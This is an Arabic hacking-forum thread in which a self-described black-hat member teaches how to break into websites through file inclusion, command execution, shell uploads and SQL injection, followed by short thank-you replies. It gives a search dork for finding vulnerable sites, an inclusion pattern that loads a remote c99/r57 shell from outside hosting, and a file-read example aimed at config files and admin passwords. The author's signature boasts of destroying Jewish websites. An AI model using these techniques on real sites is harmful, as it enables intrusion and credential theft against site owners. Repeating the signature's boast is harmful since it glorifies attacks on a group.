نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 17/08/2010, 21:49   المشاركة رقم: 1
المعلومات
الكاتب:
 DR.X  
اللقب:
(( الزعيم ))
الصورة الرمزية
 
الصورة الرمزية DR.X

البيانات
التسجيل : Aug 2010
العضوية : 467
الاهتمامات : MASTER HACKER
الإقامة : IRAQ
المواضيع : 158
الردود : 359
المجموع : 517
بمعدل : 0.09 يوميا
الاختراقات : [DR.X]
مجتمعنا : []
الصنف : Black Hat Hacker
آخر تواجد : 02/02/2013/00:54
سبب الغياب : حاظر
معدل التقييم: 16
نقاط التقييم: 10
DR.X is on a distinguished road
شكراً: 0
تم شكره 18 مرة في 12 مشاركة

 Iraq


الإتصالات
الحالة:
DR.X غير متواجد حالياً
وسائل الإتصال:

Talking حوار حول استغلال ثغرات المنتديات واستغلالها

كيف الاحوال جميعا

درس اليوم شرح بيه بعض الثغرات

اللي تفيدنا لما نجي نستهدف موقع
ونلقي بيه الثغرة نعرف شنو هي وشنو استثمارها


اولا نجي للثغرة المألوفه

remote file include

remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ

ادراج ملف للتحكم

طيب للتحكم في ايه

اقولك في الموقع اللي عايزين نخترقوا

طيب ايه نوع الملف
بيكون شيل ------ هذ الشيل مرفوع علي استضافه بصيغة txt يتم ربطه بالموقع عن طريق الثغرة
للتحكم في الموقع والسيرفر كامل
---------------------
اوكـ نجيب ثغرة نطبق عليها

Dork:



كود:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
..................................

طيب dork للي ما يعرفها يعني كود البحث عن الثغرة في مواقع البحث
واللي تحتها هذا هو الكود اللي بنبحث عنوا في غوغل مثلا حتي نري المواقع المصابه به

نجي للاستثمار او الاستغلال
بعض الكلمات اللي لما تراها تعرف انها استغلال
Example:
Expl:
Exploit:
Exploits:
Expl



كود:
[] txt?
نشرح المثال اللي فوق

[] عنوان الموقع
ممكن يكون مكتوب في الثغر
kmitam
الاسكريبت المصاب

= لادراج الشيل

[]




شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها

طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ


كود:
[]]/kmitam/htmlcode.php?file=http://[shll]/ txt?
ثغرة الفايل انكلود بتسمح لنا بأدراج شيل علي الموقع المصاب بها

يعني لو انا عندي موقع اسموا
[]
مركب به اسكريبت اسموا phpp هذا السكريبت به ثغرة من نوع ريموت فايل انكلود
استغلالها = ?index.php?gap=shll
طيب عشان اطبقها علي موقعي



كود:
[]
t?
وهذا شيل روسي رافعوا علي استضافه مجانيه بصيغة txt
'طيب فيه عندنا شيل روسي c99
وشيل r57
وشل sniper-sa وشيلات كتيرة

-Local File Include
او ...Remote File Disclosure
اختصارها lfi
طبعا هي شبيهه بالفايل انكلود
لكنها تسمح بادراج وقراءة الملفات علي السيرفر المصاب بالثغرة

بتكون زي كدا
[]
يعني رابط الموقع + السكريبت المصاب + الملف المصاب + تطيبق الاوامر
مثلا احنا عندنا ع الموقع داله اسمها get وعايزين نقرا الكونفيق تبعها
بيكون استغلالها زي كذا
http://localhost/mkportal/index.php?get=config.php
بمعني ان احنا امرنا السيرفر يقري لنا الكونفيق الموجود بملف get الموجود بالاسكريبت mkportal


النوع الثالث

remote command execution

عملها تطبيق الاوامر علي السيرفر مباشرة
طبعا راح نخصص دروس لاوامر اللينكس

مثال عليها


كود:
[]
نشرح المثال
هذا الموقع مصاب بثغرة الكوماند
استغلالها بيكون عرض اوامر اللينكس مباشرة علي الموقع المصاب
وهنا امرنا السيرفر بأحضار الملفات والمجلدات للموقع بالامر dir
بأمكاننا أمرة باي اوامر


النوع الرابع
Upload Shell


وهي ثغرة مراكز التحميل
ان وجدت بأمكاننا رفع ملفات خبيثه بصيغة php يعني نرفع الشيل ونضحك علي الموقع
ثغرة سهلها ولا تحتاج شرح

لكن بشرحها بالتفصيل فيما بعد


النوع الخامس

Remote SQL Injection

ثغرات خطيرة وانتشرت بكثرة هذة الايام
لان اغلب مبرمجين php يكتبون الان دوالهم بالسكيول والاتصال مع قواعد البيانات

ومهمتها سحب اليوزرات وقراءة الملفات
يعني حسب الثغرة المكتشفه بيكون النتيجه ممكن تجيب لنا باسورد المدير

مثال لها

[]

وهذا دورك البحث

d0rk :: "use your mind"
وهذا الاستغلال



كود:
[]
او


كود:
[]
طبعا بتضع الموقع المصاب
واضغط اوكـ

وهو بيطلع لك اليوزر نيمـ والباسورد اذا كان الموقع مصاب



تحياتي



آخر مواضيع » DR.X

توقيع : DR.X

DR.X




stop my if you can

كان بوسعي ان ابيد مواقع اليهود كلها ولكني تركت بعضا منها ليحكوا لكم لماذا كنت ابيدهم


[email protected]
[email protected]

عرض البوم صور DR.X   رد مع اقتباس
قديم 17/08/2010, 21:55   المشاركة رقم: 2
المعلومات
الكاتب:
 dabelzero  
اللقب:

الإتصالات
الحالة:
dabelzero غير متواجد حالياً
وسائل الإتصال:

**** بارك الله فيك

عرض البوم صور dabelzero   رد مع اقتباس
قديم 17/08/2010, 22:04   المشاركة رقم: 3
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

مشكور اخي بارك الله فيك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 18/08/2010, 08:08   المشاركة رقم: 4
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

******* اخي العزيز
جزاك الله خيراً
تحيتي لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 21
التنين الاسود , dabelzero , dahapp , DR.X , ExPLo!T_Dz , hacker almooot , HACKER==MAN , ilyas0206=DZ , ksa501 , mbsoft , MdMn HaCk3r , mohmax , moja4ed_fz , mysecretcode , pain96 , redacamp8 , S-japonia33 , S1LV3rS3rf3r , The MaSk , WOLF_DZ , ZiRbE$t

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
29/55 استغلال ثغرات sql injection جاهزه yasMouh دورة اختراق المواقع والسيرفورات | HCJ 10 14/11/2014 10:46
23/55 شرح استغلال ثغرات command execution yasMouh دورة اختراق المواقع والسيرفورات | HCJ 5 25/10/2014 12:05
32/55 استغلال ثغرات ال xss yasMouh دورة اختراق المواقع والسيرفورات | HCJ 5 09/08/2014 11:47
33/55 استغلال ثغرات file upload yasMouh دورة اختراق المواقع والسيرفورات | HCJ 5 18/07/2013 15:37
استغلال ثغرات Blind Sql injection ViRuS_Ra3cH [ منتدى حـقن قواعد البيانات | Sql injcetion ] 6 18/08/2010 16:08

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 01:46.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115